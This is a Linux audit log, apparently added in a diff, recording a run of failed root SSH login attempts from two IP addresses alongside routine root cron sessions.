+type=USER_AUTH msg=audit(1551485503.531:152): pid=16556 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485503.531:153): pid=16556 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485505.655:154): pid=16556 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485505.659:155): pid=16556 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485509.871:156): pid=16568 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485509.871:157): pid=16568 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485509.887:158): pid=16562 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485509.887:159): pid=16562 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485511.923:160): pid=16568 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485511.923:161): pid=16568 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485512.011:162): pid=16562 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485512.011:163): pid=16562 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485513.583:164): pid=16568 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485513.583:165): pid=16568 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485513.755:166): pid=16562 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485513.755:167): pid=16562 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485517.812:168): pid=16574 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485517.812:169): pid=16574 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485519.956:170): pid=16574 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485519.956:171): pid=16574 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485520.100:172): pid=16576 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485520.100:173): pid=16576 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_ACCT msg=audit(1551485521.328:174): pid=16587 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551485521.328:175): pid=16587 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551485521.328:176): pid=16587 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=243 res=1
+type=USER_START msg=audit(1551485521.328:177): pid=16587 uid=0 auid=0 ses=243 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551485521.328:178): pid=16587 uid=0 auid=0 ses=243 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551485521.328:179): pid=16587 uid=0 auid=0 ses=243 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_AUTH msg=audit(1551485522.040:180): pid=16574 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485522.040:181): pid=16574 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485522.304:182): pid=16576 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485522.304:183): pid=16576 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485524.764:184): pid=16576 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485524.764:185): pid=16576 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485525.584:186): pid=16589 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485525.584:187): pid=16589 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485527.712:188): pid=16589 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485527.712:189): pid=16589 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485530.060:190): pid=16595 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485530.060:191): pid=16595 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485530.100:192): pid=16589 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485530.100:193): pid=16589 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485532.288:194): pid=16595 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485532.288:195): pid=16595 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485534.244:196): pid=16601 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485534.244:197): pid=16601 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485534.420:198): pid=16595 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485534.420:199): pid=16595 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485536.584:200): pid=16601 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485536.584:201): pid=16601 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485538.200:202): pid=16601 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485538.200:203): pid=16601 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485538.268:204): pid=16603 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485538.268:205): pid=16603 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485540.544:206): pid=16603 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485540.544:207): pid=16603 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485542.216:208): pid=16617 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485542.216:209): pid=16617 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485542.772:210): pid=16603 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485542.772:211): pid=16603 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485544.328:212): pid=16617 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485544.328:213): pid=16617 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485546.052:214): pid=16617 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485546.052:215): pid=16617 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485548.260:216): pid=16623 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485548.260:217): pid=16623 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485550.240:218): pid=16623 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485550.240:219): pid=16623 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485550.268:220): pid=16629 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485550.268:221): pid=16629 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485552.476:222): pid=16629 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485552.476:223): pid=16629 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485552.536:224): pid=16623 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485552.536:225): pid=16623 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485554.620:226): pid=16629 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485554.620:227): pid=16629 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485558.080:228): pid=16635 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485558.080:229): pid=16635 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485559.456:230): pid=16638 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485559.456:231): pid=16638 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485560.468:232): pid=16635 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485560.468:233): pid=16635 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485561.904:234): pid=16638 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485561.904:235): pid=16638 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485563.476:236): pid=16635 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485563.476:237): pid=16635 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485564.092:238): pid=16638 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485564.096:239): pid=16638 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485568.208:240): pid=16649 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485568.208:241): pid=16649 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485568.344:242): pid=16651 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485568.344:243): pid=16651 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485570.596:244): pid=16649 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485570.596:245): pid=16649 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485570.696:246): pid=16651 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485570.696:247): pid=16651 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485572.932:248): pid=16649 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=36.156.24.99 addr=36.156.24.99 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485572.932:249): pid=16649 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=36.156.24.99 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485572.984:250): pid=16651 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485572.984:251): pid=16651 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485576.876:252): pid=16661 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485576.876:253): pid=16661 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485579.460:254): pid=16661 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485579.460:255): pid=16661 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_ACCT msg=audit(1551485581.332:256): pid=16672 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551485581.332:257): pid=16672 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551485581.332:258): pid=16672 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=244 res=1
+type=USER_START msg=audit(1551485581.332:259): pid=16672 uid=0 auid=0 ses=244 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551485581.336:260): pid=16672 uid=0 auid=0 ses=244 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551485581.336:261): pid=16672 uid=0 auid=0 ses=244 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_AUTH msg=audit(1551485581.652:262): pid=16661 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485581.652:263): pid=16661 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485585.896:264): pid=16674 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485585.896:265): pid=16674 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485588.056:266): pid=16674 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485588.056:267): pid=16674 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485590.492:268): pid=16674 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485590.492:269): pid=16674 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485594.572:270): pid=16684 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485594.572:271): pid=16684 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485596.824:272): pid=16684 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485596.824:273): pid=16684 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485598.816:274): pid=16684 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
+type=USER_LOGIN msg=audit(1551485598.816:275): pid=16684 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=login acct="root" exe="/usr/sbin/sshd" hostname=? addr=61.184.247.3 terminal=sshd res=failed'
+type=USER_AUTH msg=audit(1551485602.940:276): pid=16698 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:authentication acct="root" exe="/usr/sbin/sshd" hostname=61.184.247.3 addr=61.184.247.3 terminal=ssh res=failed'
